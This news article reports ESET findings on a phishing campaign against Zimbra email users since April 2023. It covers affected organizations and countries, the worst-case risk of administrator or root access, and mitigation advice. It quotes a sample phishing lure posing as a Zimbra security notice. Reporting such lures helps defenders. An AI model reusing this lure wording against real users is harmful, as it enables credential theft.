A Significant Portion of a Specific Email Service’s User Base Under Attack for Sensitive Credentials.

A widespread phishing campaign has targeted customers of the Zimbra Collaboration software suite, impacting hundreds of organizations across several countries.

Zimbra, known for its collaborative software suite featuring an email server and web client, serves as an alternative to traditional enterprise email solutions, although it commands a smaller market share, as indicated by user statistics from Enlyft and 6sense.

Throughout the year, Zimbra has faced various security challenges, including a remote code execution vulnerability, a zero-day cross-site scripting issue, and an infostealing campaign attributed to North Korea.

ESET researchers reveal that an unidentified threat actor has been conducting a broad phishing campaign since April 2023, targeting Zimbra’s privileged account credentials. While primarily focusing on small-to-midsized businesses (the primary customer base for Zimbra’s open-core software), the campaign also ensnared some government organizations.

The campaign has affected ‘hundreds of different organizations,’ according to Anton Cherepanov, Senior Malware Researcher at ESET. Nevertheless, it’s challenging to quantify the full extent of the damage since most attacks were intercepted before causing harm.

Zimbra Users Under Attack in Phishing Campaign

Every attack follows a familiar pattern: a generic phishing email, seemingly originating from Zimbra, conveys an urgent message regarding various scenarios, such as a server update or account deactivation. For instance, a message titled ‘Important Information from Zimbra Security Service’ might read:

Commencing on 3/7/2023, your Zimbra web client login page is undergoing changes. We are making preparations for an email update. To prevent deactivation and ensure continued access to your email account, please review the attachment for download instructions.

Consequences for Zimbra Customers

Ultimately, users who enter their passwords into the fraudulent login page unwittingly supply sensitive information directly to the attackers.

Anton Cherepanov notes, ‘The worst-case scenario involves attackers obtaining Zimbra Administrator privileges and potentially gaining root privileges on the server itself. However, this outcome depends on several factors, including potential password reuse and configuration specifics.’

Poland stands out as the most heavily affected country by this campaign, followed by Ecuador and Italy. The attacks have also extended to regions as diverse as Mexico, Kazakhstan, and the Netherlands. The common denominator among these targets is their utilization of Zimbra.

To mitigate the risk of compromise, Cherepanov recommends adhering to standard security practices, such as employing robust passwords, implementing multi-factor authentication, and keeping Zimbra up to date with the latest version.